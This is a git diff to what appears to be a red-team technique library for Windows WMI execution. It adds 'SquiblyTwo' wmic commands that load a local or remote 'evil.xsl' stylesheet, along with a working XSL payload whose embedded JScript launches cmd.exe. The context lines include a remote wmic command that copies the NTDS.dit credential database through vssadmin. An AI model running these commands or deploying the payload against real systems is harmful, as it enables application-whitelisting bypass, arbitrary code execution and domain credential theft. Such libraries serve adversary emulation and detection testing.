diff --git a/Windows/Execution/Windows_Management_Instrumentation.md b/Windows/Execution/Windows_Management_Instrumentation.md
index 31eaae36..1ea51ba0 100644
--- a/Windows/Execution/Windows_Management_Instrumentation.md
+++ b/Windows/Execution/Windows_Management_Instrumentation.md
@@ -43,3 +43,13 @@ Input:
 Input:
 
     wmic /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
+
+### SquiblyTwo
+
+Input:
+
+    wmic process list /FORMAT:evil.xsl
+
+Input:
+
+    wmic os get /FORMAT:”https:///evil.xsl”
diff --git a/Windows/Payloads/squiblytwo/minimalist.xsl b/Windows/Payloads/squiblytwo/minimalist.xsl
new file mode 100644
index 00000000..404dc555
--- /dev/null
+++ b/Windows/Payloads/squiblytwo/minimalist.xsl
@@ -0,0 +1,11 @@
+<?xml version='1.0'?>
+<stylesheet
+xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
+xmlns:user="placeholder"
+version="1.0">
+<output method="text"/>
+	<ms:script implements-prefix="user" language="JScript">
+	<![CDATA[
+	var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
+	]]> </ms:script>
+</stylesheet>